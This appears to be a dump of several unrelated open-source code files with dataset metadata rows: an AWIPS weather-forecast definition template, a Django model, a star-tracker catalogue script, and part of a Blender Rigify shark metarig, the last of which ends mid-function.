# OPTIONAL CONFIGURATION ITEMS
#Definition["database"] = "Official" # Source database. "Official", "Fcst", or "ISC"
#Definition["debug"] = 1
#Definition["hazardSamplingThreshold"] = (10, None) #(%cov, #points)
#Definition["editAreaSuffix"] = "_pt"
#Definition["periodCombining"] = 1 # If 1, do period combining
#Definition["includeEveningPeriod"] = 0 # If 1, include Evening Period
#Definition["useAbbreviations"] = 0 # If 1, use marine abbreviations
# Weather-related flags
#Definition["hoursSChcEnds"] = 24
# River Bar Zones
#Definition["riverBarZones"] = []
#Definition["areaDictionary"] = "AreaDictionary" # For product headers
#Definition["language"] = "english"
#Definition["lineLength"] = 66
#Definition["useHolidays"] = 1
# Trouble-shooting items
#Definition["passLimit"] = 20 # Limit on passes allowed through Narrative Tree
#Definition["trace"] = 1 # Set to 1 to turn on trace through
# Narrative Tree for trouble-shooting
| 41.233333 | 103 | 0.605093 | ##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: Raytheon Company
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
##
# This is a base file that is not intended to be overridden.
##
# ---------------------------------------------------------------------
# This software is in the public domain, furnished "as is", without
# technical support, and with no warranty, express or implied, as to
# its usefulness for any purpose.
#
# CWF_Pacific_<site>_<MultiPil>_Definition.TextUtility
#
# This file sets up all the Product Definition overrides for the
# CWF_Pacific formatter for a site.
#
# ---------------------------------------------------------------------
#**********************************************************************
# MAKE NO CHANGES HERE
# The minimum content of this file is the following Definition statement
Definition = {}
# End MAKE NO CHANGES HERE
#**********************************************************************
#####################################################
# Override VariableList if desired
#
#VariableList = []
#----- WFO <site> CWF_Pacific Definition -----
# Definition Statements must start in column 1.
# REQUIRED CONFIGURATION ITEMS
#Definition['displayName'] = None
Definition['displayName'] = "CWFPacific_<MultiPil>"
Definition["showZoneCombiner"] = 1 # 1 to cause zone combiner to display
Definition["defaultEditAreas"] = "Combinations_CWF_<site>_<MultiPil>"
Definition["mapNameForCombinations"] = "Marine_Zones_<site>" # Map background for creating Combinations
#Special multiple product domains for certain sites:
if "<site>" == "AJK":
if "_<MultiPil>" == "_AJK":
Definition["subDomainUGCs"] = ["PKZ011","PKZ012","PKZ013","PKZ021",
"PKZ022","PKZ031","PKZ032","PKZ033",
"PKZ034","PKZ035","PKZ036"]
elif "_<MultiPil>" == "_AEG":
Definition["subDomainUGCs"] = ["PKZ041","PKZ042","PKZ043","PKZ051",
"PKZ052"]
elif "<site>" == "GUM":
if "_<MultiPil>" == "_MY":
Definition["subDomainUGCs"] = ["PMZ151","PMZ152","PMZ153","PMZ154"]
elif "_<MultiPil>" == "_PQ":
Definition["subDomainUGCs"] = ["PMZ161","PMZ171","PMZ172","PMZ173",
"PMZ174","PMZ181","PMZ191"]
elif "<site>" == "AFG":
if "_<MultiPil>" == "_NSB":
Definition["subDomainUGCs"] = ["PKZ225","PKZ230","PKZ235","PKZ240",
"PKZ245"]
elif "_<MultiPil>" == "_WCZ":
Definition["subDomainUGCs"] = ["PKZ200","PKZ210","PKZ215","PKZ220"]
# Header configuration items
#Definition["productName"] = "Coastal Waters Forecast" # name of product
Definition["fullStationID"] = "<fullStationID>" # full station identifier (4letter)
Definition["wmoID"] = "<wmoID>" # WMO ID
Definition["pil"] = "<pil>" # product pil
Definition["areaName"] = "<state>" # Name of state, such as "Georgia"
Definition["wfoCityState"] = "<wfoCityState>" # Location of WFO - city st
Definition["textdbPil"] = "<textdbPil>" # Product ID for storing to AWIPS text database.
Definition["awipsWANPil"] = "<awipsWANPil>" # Product ID for transmitting to AWIPS WAN.
Definition["outputFile"] = "{prddir}/TEXT/CWF_<MultiPil>.txt"
# OPTIONAL CONFIGURATION ITEMS
#Definition["database"] = "Official" # Source database. "Official", "Fcst", or "ISC"
#Definition["debug"] = 1
#Definition["hazardSamplingThreshold"] = (10, None) #(%cov, #points)
#Definition["editAreaSuffix"] = "_pt"
#Definition["periodCombining"] = 1 # If 1, do period combining
#Definition["includeEveningPeriod"] = 0 # If 1, include Evening Period
#Definition["useAbbreviations"] = 0 # If 1, use marine abbreviations
# Weather-related flags
#Definition["hoursSChcEnds"] = 24
# River Bar Zones
#Definition["riverBarZones"] = []
#Definition["areaDictionary"] = "AreaDictionary" # For product headers
#Definition["language"] = "english"
#Definition["lineLength"] = 66
#Definition["useHolidays"] = 1
# Trouble-shooting items
#Definition["passLimit"] = 20 # Limit on passes allowed through Narrative Tree
#Definition["trace"] = 1 # Set to 1 to turn on trace through
# Narrative Tree for trouble-shooting
| 0 | 0 | 0 |
bbc7cdc6585a469f97577c73e2c29aaa3ad18a36 | 290 | py | Python | market/products/models/category.py | hbvj99/market-api | 489c9433556002cb391b93cbd6486da739c2418a | [
"MIT"
] | 1 | 2021-08-28T05:30:40.000Z | 2021-08-28T05:30:40.000Z | market/products/models/category.py | hbvj99/market-api | 489c9433556002cb391b93cbd6486da739c2418a | [
"MIT"
] | 1 | 2022-01-14T08:57:19.000Z | 2022-01-14T08:57:20.000Z | market/products/models/category.py | hbvj99/market-api | 489c9433556002cb391b93cbd6486da739c2418a | [
"MIT"
] | 1 | 2022-01-11T10:14:27.000Z | 2022-01-11T10:14:27.000Z | from django.db import models
from django.utils.translation import ugettext_lazy as _
from ...commons.models import BaseModel
| 29 | 67 | 0.755172 | from django.db import models
from django.utils.translation import ugettext_lazy as _
from ...commons.models import BaseModel
class Category(BaseModel):
name = models.CharField(_('name'), max_length=90, blank=False)
code = models.CharField(_('code'), max_length=110, blank=False)
| 0 | 140 | 23 |
966f8e183f43f4d45660343c45bd7a42887ab7e1 | 22 | py | Python | core/constants/not_available.py | eugene-the-red/automata-core | 8470232ac17410fb907cb285b8102c1712699740 | [
"Unlicense"
] | null | null | null | core/constants/not_available.py | eugene-the-red/automata-core | 8470232ac17410fb907cb285b8102c1712699740 | [
"Unlicense"
] | null | null | null | core/constants/not_available.py | eugene-the-red/automata-core | 8470232ac17410fb907cb285b8102c1712699740 | [
"Unlicense"
] | null | null | null | NOT_AVAILABLE = 'N/A'
| 11 | 21 | 0.681818 | NOT_AVAILABLE = 'N/A'
| 0 | 0 | 0 |
c11aa728ef111b13cb8574664ef704a9344ead5d | 5,546 | py | Python | Sigma_Selection.py | Jamun-Fanatic-Foreva/STADS---Star-Matching | 0a96885a168b8de86eb4f51ba401980969023452 | [
"MIT"
] | 1 | 2019-10-29T13:13:48.000Z | 2019-10-29T13:13:48.000Z | Sigma_Selection.py | Jamun-Fanatic-Foreva/STADS---Star-Matching | 0a96885a168b8de86eb4f51ba401980969023452 | [
"MIT"
] | null | null | null | Sigma_Selection.py | Jamun-Fanatic-Foreva/STADS---Star-Matching | 0a96885a168b8de86eb4f51ba401980969023452 | [
"MIT"
] | 1 | 2020-03-09T17:28:18.000Z | 2020-03-09T17:28:18.000Z | import numpy as np
import pandas as pd
import time, gc
from GV_Catalogue_Gen import angularDistance
def genSigmaCatalogue(CATALOGUE, mag_limit = 6, FOV_limit = 20):
'''
Generates the mean of the sigma for each star in the catalogue.
Sigma between star A and star B is defined as (1/6) of the angular
distance between the two stars.
Such values of sigma are calculated for star A to every other star
in the catalogue that are its nearest neighbours, i.e., all those
stars within a circular FOV defined by FOV_limit.
This set of sigma values is defined as sigma_n.
The mean of all the elements of sigma_n gives us mu_n.
This mean value is paired with the corresponding star A.
This process repeats for every star in the catalogue, and the star IDs
the corresponding mu_n values are collated in a dataframe.
Parameters
----------
CATALOGUE : pd.Dataframe
The 'master' star catalogue on which the function works
mag_limit : floating-point number, default = 6
The upper magnitude limit of stars that are required in the reference catalogue
FOV_limit: floating-point number, default = 20
Defines the circular radius (in degrees) which demarcates which stars from the
catalogue are to be considered as nearest neighbours for a given star
Returns
-------
SIGMA_CATALOGUE : pd.Dataframe
The dataframe collated from the star IDs and their corresponding mu_n
'''
# Start clock-1
start1 = time.time()
# Generate restricted catalogue based on upper magnitude limit
temp0 = CATALOGUE[CATALOGUE.Mag <= mag_limit]
# Number of rows in the resticted catalogue
rows = temp0.shape[0]
# Resets the index of <temp0>
temp0.index = list(range(rows))
# Prints total number of stars in <temp0> and the (n)X(n-1)- unique combinations per star
print('Number of stars - ', rows)
print('Number of unique combinations per star= ', (rows-1)*rows)
# Initialize the number of iterations to take place
no_iter = (rows)
# Initialize SIGMA_CATALOGUE
SIGMA_CATALOGUE = pd.DataFrame(columns=['Star_ID', 'mu_n'])
for i in range(no_iter):
# Throws error if an iteration runs beyond number of available rows in <temp0>
assert i<(rows), 'IndexError: iterating beyond available number of rows'
# Generates <temp1> dataframe which has the (i - th) star of <temp0>
# repetated (rows-1) times
temp1 = pd.DataFrame(columns = ['Star_ID1','RA_1', 'Dec_1', 'Mag_1'])
s1, ra, dec, mag = temp0.iloc[i]
temp1.loc[0] = [s1] + [ra] + [dec] + [mag]
temp1 = pd.concat([temp1]*(rows-1), ignore_index=True)
# Stores value of the star_ID for which mu_n will be calculated
star_id_i = s1
# Generates <temp2> dataframe by copying values of <temp0> and dropping the
# (i -th) row from it
temp2 = temp0
temp2 = temp2.drop([i], axis = 0)
# Resets the index
temp2.index = list(range(0, rows-1))
# Concatenates <temp1> & <temp2> side-by-side such that resulting <temp3> has (8) columns altogether
temp3 = pd.concat([temp1, temp2], axis=1)
# Renaming columns of <temp3>
temp3.columns = ['Star_ID1','RA_1', 'Dec_1', 'Mag_1', 'Star_ID2', 'RA_2', 'Dec_2', 'Mag_2']
# Calculate angular distance between the two stars present in every row in <temp3>
cols = ['RA_1', 'RA_2', 'Dec_1', 'Dec_2']
temp3['Ang_Distance'] = temp3.apply(angularDistance, axis = 1, col_names = cols)
# Generates <temp4> by selecting rows from <temp3> whose angular distances is
# less than equal to the circular FOV limit
temp4 = temp3[temp3.Ang_Distance <= FOV_limit]
# Stores the value of the calculated mu_n for the current star
mu_n_i = temp4.Ang_Distance.mean()
# Multiply (mu_n_i) by (1/6) since sigma_i = Ang_distance_i, for all (i)
mu_n_i = mu_n_i/6
# Appends the entry to the SIGMA_CATALOGUE dataframe
SIGMA_CATALOGUE = SIGMA_CATALOGUE.append({'Star_ID':star_id_i, 'mu_n':mu_n_i}, ignore_index=True)
# Releases memory back to OS
if i%100 == 0:
gc.collect()
print(i/100)
# Stop clock-1
end1 = time.time() - start1
# Print time taken
print('Time Taken - ', np.round(end1,3))
return SIGMA_CATALOGUE
def main():
'''
main function
'''
# Reads 'Master' star catalogue
CATALOGUE = pd.read_csv(r"F:\IIT Bombay\SatLab\Star Tracker\Programs\Catalogues\Modified Star Catalogue.csv")
# StarID: The database primary key from a larger "master database" of stars
# Mag: The star's apparent visual magnitude
# RA, Dec: The star's right ascension and declination, for epoch 2000.0 (Unit: RA - hrs; Dec - degrees)
# Sorts <CATALOGUE>
CATALOGUE.sort_values('Mag', inplace=True)
# Run function
result = genSigmaCatalogue(CATALOGUE, mag_limit = 6, FOV_limit = 20)
# Sort <result>
result.sort_values('mu_n', inplace=True)
# Generates CSV of <result>
result.to_csv('SigmaCatalogue.csv', index = False)
print('Done')
if __name__ == '__main__':
main()
| 37.986301 | 114 | 0.624594 | import numpy as np
import pandas as pd
import time, gc
from GV_Catalogue_Gen import angularDistance
def genSigmaCatalogue(CATALOGUE, mag_limit = 6, FOV_limit = 20):
'''
Generates the mean of the sigma for each star in the catalogue.
Sigma between star A and star B is defined as (1/6) of the angular
distance between the two stars.
Such values of sigma are calculated for star A to every other star
in the catalogue that are its nearest neighbours, i.e., all those
stars within a circular FOV defined by FOV_limit.
This set of sigma values is defined as sigma_n.
The mean of all the elements of sigma_n gives us mu_n.
This mean value is paired with the corresponding star A.
This process repeats for every star in the catalogue, and the star IDs
the corresponding mu_n values are collated in a dataframe.
Parameters
----------
CATALOGUE : pd.Dataframe
The 'master' star catalogue on which the function works
mag_limit : floating-point number, default = 6
The upper magnitude limit of stars that are required in the reference catalogue
FOV_limit: floating-point number, default = 20
Defines the circular radius (in degrees) which demarcates which stars from the
catalogue are to be considered as nearest neighbours for a given star
Returns
-------
SIGMA_CATALOGUE : pd.Dataframe
The dataframe collated from the star IDs and their corresponding mu_n
'''
# Start clock-1
start1 = time.time()
# Generate restricted catalogue based on upper magnitude limit
temp0 = CATALOGUE[CATALOGUE.Mag <= mag_limit]
# Number of rows in the resticted catalogue
rows = temp0.shape[0]
# Resets the index of <temp0>
temp0.index = list(range(rows))
# Prints total number of stars in <temp0> and the (n)X(n-1)- unique combinations per star
print('Number of stars - ', rows)
print('Number of unique combinations per star= ', (rows-1)*rows)
# Initialize the number of iterations to take place
no_iter = (rows)
# Initialize SIGMA_CATALOGUE
SIGMA_CATALOGUE = pd.DataFrame(columns=['Star_ID', 'mu_n'])
for i in range(no_iter):
# Throws error if an iteration runs beyond number of available rows in <temp0>
assert i<(rows), 'IndexError: iterating beyond available number of rows'
# Generates <temp1> dataframe which has the (i - th) star of <temp0>
# repetated (rows-1) times
temp1 = pd.DataFrame(columns = ['Star_ID1','RA_1', 'Dec_1', 'Mag_1'])
s1, ra, dec, mag = temp0.iloc[i]
temp1.loc[0] = [s1] + [ra] + [dec] + [mag]
temp1 = pd.concat([temp1]*(rows-1), ignore_index=True)
# Stores value of the star_ID for which mu_n will be calculated
star_id_i = s1
# Generates <temp2> dataframe by copying values of <temp0> and dropping the
# (i -th) row from it
temp2 = temp0
temp2 = temp2.drop([i], axis = 0)
# Resets the index
temp2.index = list(range(0, rows-1))
# Concatenates <temp1> & <temp2> side-by-side such that resulting <temp3> has (8) columns altogether
temp3 = pd.concat([temp1, temp2], axis=1)
# Renaming columns of <temp3>
temp3.columns = ['Star_ID1','RA_1', 'Dec_1', 'Mag_1', 'Star_ID2', 'RA_2', 'Dec_2', 'Mag_2']
# Calculate angular distance between the two stars present in every row in <temp3>
cols = ['RA_1', 'RA_2', 'Dec_1', 'Dec_2']
temp3['Ang_Distance'] = temp3.apply(angularDistance, axis = 1, col_names = cols)
# Generates <temp4> by selecting rows from <temp3> whose angular distances is
# less than equal to the circular FOV limit
temp4 = temp3[temp3.Ang_Distance <= FOV_limit]
# Stores the value of the calculated mu_n for the current star
mu_n_i = temp4.Ang_Distance.mean()
# Multiply (mu_n_i) by (1/6) since sigma_i = Ang_distance_i, for all (i)
mu_n_i = mu_n_i/6
# Appends the entry to the SIGMA_CATALOGUE dataframe
SIGMA_CATALOGUE = SIGMA_CATALOGUE.append({'Star_ID':star_id_i, 'mu_n':mu_n_i}, ignore_index=True)
# Releases memory back to OS
if i%100 == 0:
gc.collect()
print(i/100)
# Stop clock-1
end1 = time.time() - start1
# Print time taken
print('Time Taken - ', np.round(end1,3))
return SIGMA_CATALOGUE
def main():
'''
main function
'''
# Reads 'Master' star catalogue
CATALOGUE = pd.read_csv(r"F:\IIT Bombay\SatLab\Star Tracker\Programs\Catalogues\Modified Star Catalogue.csv")
# StarID: The database primary key from a larger "master database" of stars
# Mag: The star's apparent visual magnitude
# RA, Dec: The star's right ascension and declination, for epoch 2000.0 (Unit: RA - hrs; Dec - degrees)
# Sorts <CATALOGUE>
CATALOGUE.sort_values('Mag', inplace=True)
# Run function
result = genSigmaCatalogue(CATALOGUE, mag_limit = 6, FOV_limit = 20)
# Sort <result>
result.sort_values('mu_n', inplace=True)
# Generates CSV of <result>
result.to_csv('SigmaCatalogue.csv', index = False)
print('Done')
if __name__ == '__main__':
main()
| 0 | 0 | 0 |
dc3fb8bf5ca7ab124eb669944f953b242d6ee9e0 | 39,659 | py | Python | blender/2.79/scripts/addons/rigify/metarigs/Animals/shark.py | uzairakbar/bpy2.79 | 3a3e0004ac6783c4e4b89d939e4432de99026a85 | [
"MIT"
] | 2 | 2019-11-27T09:05:42.000Z | 2020-02-20T01:25:23.000Z | rigify/metarigs/Animals/shark.py | 1-MillionParanoidTterabytes/blender-addons-master | acc8fc23a38e6e89099c3e5079bea31ce85da06a | [
"Unlicense"
] | null | null | null | rigify/metarigs/Animals/shark.py | 1-MillionParanoidTterabytes/blender-addons-master | acc8fc23a38e6e89099c3e5079bea31ce85da06a | [
"Unlicense"
] | 4 | 2020-02-19T20:02:26.000Z | 2022-02-11T18:47:56.000Z | import bpy
from mathutils import Color
if __name__ == "__main__":
create(bpy.context.active_object) | 49.948363 | 270 | 0.666154 | import bpy
from mathutils import Color
def create(obj):
# generated by rigify.utils.write_metarig
bpy.ops.object.mode_set(mode='EDIT')
arm = obj.data
for i in range(6):
arm.rigify_colors.add()
arm.rigify_colors[0].name = "Root"
arm.rigify_colors[0].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[0].normal = Color((0.4352940022945404, 0.18431399762630463, 0.4156860113143921))
arm.rigify_colors[0].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[0].standard_colors_lock = True
arm.rigify_colors[1].name = "IK"
arm.rigify_colors[1].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[1].normal = Color((0.6039220094680786, 0.0, 0.0))
arm.rigify_colors[1].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[1].standard_colors_lock = True
arm.rigify_colors[2].name = "Specials"
arm.rigify_colors[2].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[2].normal = Color((0.9568629860877991, 0.7882350087165833, 0.04705899953842163))
arm.rigify_colors[2].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[2].standard_colors_lock = True
arm.rigify_colors[3].name = "Tweak"
arm.rigify_colors[3].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[3].normal = Color((0.03921600058674812, 0.21176500618457794, 0.5803920030593872))
arm.rigify_colors[3].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[3].standard_colors_lock = True
arm.rigify_colors[4].name = "FK"
arm.rigify_colors[4].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[4].normal = Color((0.11764699965715408, 0.5686269998550415, 0.035294000059366226))
arm.rigify_colors[4].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[4].standard_colors_lock = True
arm.rigify_colors[5].name = "Extra"
arm.rigify_colors[5].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[5].normal = Color((0.9686279892921448, 0.2509799897670746, 0.09411799907684326))
arm.rigify_colors[5].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[5].standard_colors_lock = True
for i in range(29):
arm.rigify_layers.add()
arm.rigify_layers[0].name = "Face"
arm.rigify_layers[0].row = 1
arm.rigify_layers[0].set = False
arm.rigify_layers[0].group = 5
arm.rigify_layers[1].name = "Face (Tweak)"
arm.rigify_layers[1].row = 2
arm.rigify_layers[1].set = False
arm.rigify_layers[1].group = 4
arm.rigify_layers[2].name = " "
arm.rigify_layers[2].row = 1
arm.rigify_layers[2].set = False
arm.rigify_layers[2].group = 0
arm.rigify_layers[3].name = "Spine"
arm.rigify_layers[3].row = 3
arm.rigify_layers[3].set = False
arm.rigify_layers[3].group = 3
arm.rigify_layers[4].name = "Spine (Tweak)"
arm.rigify_layers[4].row = 4
arm.rigify_layers[4].set = False
arm.rigify_layers[4].group = 4
arm.rigify_layers[5].name = "Tail"
arm.rigify_layers[5].row = 5
arm.rigify_layers[5].set = False
arm.rigify_layers[5].group = 6
arm.rigify_layers[6].name = "Fins.L"
arm.rigify_layers[6].row = 6
arm.rigify_layers[6].set = False
arm.rigify_layers[6].group = 5
arm.rigify_layers[7].name = "Fins.L (Tweak)"
arm.rigify_layers[7].row = 7
arm.rigify_layers[7].set = False
arm.rigify_layers[7].group = 4
arm.rigify_layers[8].name = "Fins.R"
arm.rigify_layers[8].row = 6
arm.rigify_layers[8].set = False
arm.rigify_layers[8].group = 5
arm.rigify_layers[9].name = "Fins.R (Tweak)"
arm.rigify_layers[9].row = 7
arm.rigify_layers[9].set = False
arm.rigify_layers[9].group = 4
arm.rigify_layers[10].name = "Fins"
arm.rigify_layers[10].row = 8
arm.rigify_layers[10].set = False
arm.rigify_layers[10].group = 3
arm.rigify_layers[11].name = "Fins (Tweak)"
arm.rigify_layers[11].row = 9
arm.rigify_layers[11].set = False
arm.rigify_layers[11].group = 4
arm.rigify_layers[12].name = " "
arm.rigify_layers[12].row = 1
arm.rigify_layers[12].set = False
arm.rigify_layers[12].group = 0
arm.rigify_layers[13].name = " "
arm.rigify_layers[13].row = 1
arm.rigify_layers[13].set = False
arm.rigify_layers[13].group = 6
arm.rigify_layers[14].name = " "
arm.rigify_layers[14].row = 1
arm.rigify_layers[14].set = False
arm.rigify_layers[14].group = 0
arm.rigify_layers[15].name = " "
arm.rigify_layers[15].row = 1
arm.rigify_layers[15].set = False
arm.rigify_layers[15].group = 0
arm.rigify_layers[16].name = " "
arm.rigify_layers[16].row = 1
arm.rigify_layers[16].set = False
arm.rigify_layers[16].group = 0
arm.rigify_layers[17].name = " "
arm.rigify_layers[17].row = 1
arm.rigify_layers[17].set = False
arm.rigify_layers[17].group = 0
arm.rigify_layers[18].name = " "
arm.rigify_layers[18].row = 1
arm.rigify_layers[18].set = False
arm.rigify_layers[18].group = 0
arm.rigify_layers[19].name = " "
arm.rigify_layers[19].row = 1
arm.rigify_layers[19].set = False
arm.rigify_layers[19].group = 0
arm.rigify_layers[20].name = " "
arm.rigify_layers[20].row = 1
arm.rigify_layers[20].set = False
arm.rigify_layers[20].group = 0
arm.rigify_layers[21].name = " "
arm.rigify_layers[21].row = 1
arm.rigify_layers[21].set = False
arm.rigify_layers[21].group = 0
arm.rigify_layers[22].name = " "
arm.rigify_layers[22].row = 1
arm.rigify_layers[22].set = False
arm.rigify_layers[22].group = 0
arm.rigify_layers[23].name = " "
arm.rigify_layers[23].row = 1
arm.rigify_layers[23].set = False
arm.rigify_layers[23].group = 0
arm.rigify_layers[24].name = " "
arm.rigify_layers[24].row = 1
arm.rigify_layers[24].set = False
arm.rigify_layers[24].group = 0
arm.rigify_layers[25].name = " "
arm.rigify_layers[25].row = 1
arm.rigify_layers[25].set = False
arm.rigify_layers[25].group = 0
arm.rigify_layers[26].name = " "
arm.rigify_layers[26].row = 1
arm.rigify_layers[26].set = False
arm.rigify_layers[26].group = 0
arm.rigify_layers[27].name = " "
arm.rigify_layers[27].row = 1
arm.rigify_layers[27].set = False
arm.rigify_layers[27].group = 0
arm.rigify_layers[28].name = "Root"
arm.rigify_layers[28].row = 14
arm.rigify_layers[28].set = False
arm.rigify_layers[28].group = 1
bones = {}
bone = arm.edit_bones.new('spine')
bone.head[:] = -0.0000, 1.3362, 0.4776
bone.tail[:] = -0.0000, 1.0816, 0.4540
bone.roll = 0.0000
bone.use_connect = False
bones['spine'] = bone.name
bone = arm.edit_bones.new('spine.001')
bone.head[:] = -0.0000, 1.0816, 0.4540
bone.tail[:] = -0.0000, 0.7152, 0.4305
bone.roll = -0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine']]
bones['spine.001'] = bone.name
bone = arm.edit_bones.new('back_fin.T.Bk')
bone.head[:] = 0.0000, 1.2501, 0.5345
bone.tail[:] = 0.0000, 1.5211, 0.7594
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine']]
bones['back_fin.T.Bk'] = bone.name
bone = arm.edit_bones.new('back_fin.B.Bk')
bone.head[:] = 0.0000, 1.2305, 0.4158
bone.tail[:] = 0.0000, 1.3289, 0.2452
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine']]
bones['back_fin.B.Bk'] = bone.name
bone = arm.edit_bones.new('spine.002')
bone.head[:] = -0.0000, 0.7152, 0.4305
bone.tail[:] = -0.0000, 0.3182, 0.4031
bone.roll = -0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.001']]
bones['spine.002'] = bone.name
bone = arm.edit_bones.new('mid_fin.Top')
bone.head[:] = 0.0000, 0.7296, 0.5396
bone.tail[:] = 0.0000, 0.7709, 0.6351
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.001']]
bones['mid_fin.Top'] = bone.name
bone = arm.edit_bones.new('mid_fin.Bot')
bone.head[:] = 0.0000, 0.7296, 0.3505
bone.tail[:] = 0.0000, 0.8233, 0.2684
bone.roll = 1.5708
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.001']]
bones['mid_fin.Bot'] = bone.name
bone = arm.edit_bones.new('back_fin.T.001.Bk')
bone.head[:] = 0.0000, 1.5211, 0.7594
bone.tail[:] = 0.0000, 1.7667, 0.9633
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['back_fin.T.Bk']]
bones['back_fin.T.001.Bk'] = bone.name
bone = arm.edit_bones.new('back_fin.B.001.Bk')
bone.head[:] = 0.0000, 1.3289, 0.2452
bone.tail[:] = 0.0000, 1.3818, 0.1513
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['back_fin.B.Bk']]
bones['back_fin.B.001.Bk'] = bone.name
bone = arm.edit_bones.new('spine.003')
bone.head[:] = -0.0000, 0.3182, 0.4031
bone.tail[:] = -0.0000, 0.0152, 0.3904
bone.roll = 0.0001
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.002']]
bones['spine.003'] = bone.name
bone = arm.edit_bones.new('back_fin.T.002.Bk')
bone.head[:] = 0.0000, 1.7667, 0.9633
bone.tail[:] = 0.0000, 1.9489, 1.1145
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['back_fin.T.001.Bk']]
bones['back_fin.T.002.Bk'] = bone.name
bone = arm.edit_bones.new('spine.008')
bone.head[:] = -0.0000, 0.0152, 0.3904
bone.tail[:] = 0.0000, -0.3259, 0.3967
bone.roll = 0.0001
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.003']]
bones['spine.008'] = bone.name
bone = arm.edit_bones.new('spine.004')
bone.head[:] = 0.0000, -0.3259, 0.3967
bone.tail[:] = 0.0000, -0.5947, 0.4044
bone.roll = -0.0001
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.008']]
bones['spine.004'] = bone.name
bone = arm.edit_bones.new('chest_fin.Bot.L')
bone.head[:] = 0.0889, 0.2605, 0.2866
bone.tail[:] = 0.1731, 0.3299, 0.1901
bone.roll = -2.3171
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.008']]
bones['chest_fin.Bot.L'] = bone.name
bone = arm.edit_bones.new('chest_fin.Bot.R')
bone.head[:] = -0.0889, 0.2605, 0.2866
bone.tail[:] = -0.1731, 0.3299, 0.1901
bone.roll = 2.3171
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.008']]
bones['chest_fin.Bot.R'] = bone.name
bone = arm.edit_bones.new('spine.005')
bone.head[:] = 0.0000, -0.5947, 0.4044
bone.tail[:] = 0.0000, -1.2084, 0.4328
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.004']]
bones['spine.005'] = bone.name
bone = arm.edit_bones.new('top_fin')
bone.head[:] = 0.0000, -0.2777, 0.5550
bone.tail[:] = 0.0000, -0.1962, 0.7053
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.004']]
bones['top_fin'] = bone.name
bone = arm.edit_bones.new('spine.006')
bone.head[:] = 0.0000, -1.2084, 0.4328
bone.tail[:] = 0.0000, -1.5634, 0.4275
bone.roll = -0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.005']]
bones['spine.006'] = bone.name
bone = arm.edit_bones.new('shoulder.L')
bone.head[:] = 0.0729, -0.9648, 0.3756
bone.tail[:] = 0.2649, -0.9648, 0.3157
bone.roll = 3.4558
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.005']]
bones['shoulder.L'] = bone.name
bone = arm.edit_bones.new('shoulder.R')
bone.head[:] = -0.0729, -0.9648, 0.3756
bone.tail[:] = -0.2649, -0.9648, 0.3157
bone.roll = -3.4558
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.005']]
bones['shoulder.R'] = bone.name
bone = arm.edit_bones.new('top_fin.001')
bone.head[:] = 0.0000, -0.1962, 0.7053
bone.tail[:] = 0.0000, -0.1362, 0.8158
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['top_fin']]
bones['top_fin.001'] = bone.name
bone = arm.edit_bones.new('spine.007')
bone.head[:] = 0.0000, -1.5634, 0.4275
bone.tail[:] = 0.0000, -2.0661, 0.4364
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.006']]
bones['spine.007'] = bone.name
bone = arm.edit_bones.new('side_fin.L')
bone.head[:] = 0.2140, -0.9624, 0.2213
bone.tail[:] = 0.5220, -0.9078, -0.1343
bone.roll = -2.3170
bone.use_connect = False
bone.parent = arm.edit_bones[bones['shoulder.L']]
bones['side_fin.L'] = bone.name
bone = arm.edit_bones.new('side_fin.R')
bone.head[:] = -0.2140, -0.9624, 0.2213
bone.tail[:] = -0.5220, -0.9078, -0.1343
bone.roll = 2.3170
bone.use_connect = False
bone.parent = arm.edit_bones[bones['shoulder.R']]
bones['side_fin.R'] = bone.name
bone = arm.edit_bones.new('eye.L')
bone.head[:] = 0.1405, -1.6860, 0.4161
bone.tail[:] = 0.3684, -1.6810, 0.4156
bone.roll = 3.1352
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.007']]
bones['eye.L'] = bone.name
